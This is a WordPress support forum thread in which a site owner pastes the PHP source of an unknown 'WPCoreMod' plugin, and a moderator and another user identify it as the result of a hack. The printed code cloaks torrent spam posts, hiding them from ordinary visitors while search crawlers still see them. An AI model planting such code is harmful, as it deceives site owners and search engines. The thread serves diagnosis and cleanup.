• Resolved gogusamsung


    Hello everyone, I just found in a website I set-up about a year ago a suspect plugin, called WpCoreMod. The full path of the plugin file is wpcoress/wpcoremod.php and it has the following content:

    I could’t find any other references on the web, so I post the content of the file below, hoping that someone esle can tell me what this plugin does (if it’s harmful).

    Thank you!

    * Plugin Name: WPCoreMod
    * Version: 1.0
    function stripos_array($str, $array)
    	foreach($array as $substr)
    		if (stripos($str, $substr) !== false)
    			return true;
    	return false;
    function add_column_views_request($clauses){
    	global $wpdb;
    	$clauses['where'] .= " AND {$wpdb->posts}.post_content NOT LIKE '%torrent%'";
    	return $clauses;
    function ex_cats($clauses)
    	global $wpdb;
    	$cats = $wpdb->get_col("SELECT key1.term_id FROM wp_term_taxonomy key1 INNER JOIN wp_term_relationships key2 on key2.term_taxonomy_id = key1.term_taxonomy_id and key1.taxonomy = 'category' INNER JOIN wp_posts key3 on key3.id = key2.object_id and key3.post_content LIKE '%torrent%'");
    	$clauses['where'] .= " AND t.term_id NOT IN(" . implode(",", $cats) . ")";
    	return $clauses;
    function wp_get_arch()
    $array	= array("google", "yahoo", "msn");
    if(stripos_array($_SERVER['HTTP_REFERER'], $array) == false && stripos_array($_SERVER['HTTP_USER_AGENT'], $array) == false)
    	add_filter("posts_clauses", "add_column_views_request");
    	add_filter("terms_clauses", "ex_cats");
    	add_action('wp_footer', 'wp_get_arch');
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  • Moderator bcworkz


    It appears to inject content for certain search provider’s bots to crawl. It certainly has nothing to do with WP core. Depending on what it’s injecting, it’s likely harmful to your site’s search ranking, but it’s not actually damaging data, so it’s not harmful in that respect.

    Regardless, you didn’t put it there, someone has unauthorized access to your site, and that has tremendous potential for harm. You should start working through at least some of the steps in FAQ My site was hacked.

    It’s sort of an unusual hack, hiding in plain sight. You may get lucky and cure the problem by simply changing passwords and removing the plugin, but I’d be surprised if it’s that easy. There’s also unwanted content in your DB. It may or may not show up on your site without the plugin. Even if not, it’s not something you would want lurking, at least take a pass at cleaning it out. Good luck!

    Thread Starter gogusamsung


    Thank you for the reply.

    UPDATE: It also messes with admin backend. When this plugin is activated, Appereance -> Menus displays something like this https://i.imgur.com/fe2jY3e.png despite the fact that the frontend displays the custom menus properly.

    Plus, I ran the SQL query above, but there is no result, so I guess there is another vulnerability that maniplulates the database content.

    My wordpress had the same problem.
    After 3 days of frustation and search “taxonomy not working” like terms at google, I found that WPCore3 Plugin by Lososev was making taxonomy not working. Also this plugin was creating articles about torrents automaticaly.

    In my case, first I saw Posts of torrents in my facebook connected page, sent by my wordpress.

    Then I noticed that Article Tags and Categories were not showing.

    Now I found some articles about this Virus / Plugin

    WP attack

    as categorias (taxonomia) desapareceram

    deleter WPcore3 plugin and solved

    The solution:
    Uninstall the plugin named “WPCore3” bade by “Lososev”

    I dont know where this plugin came from because I did not installed it.


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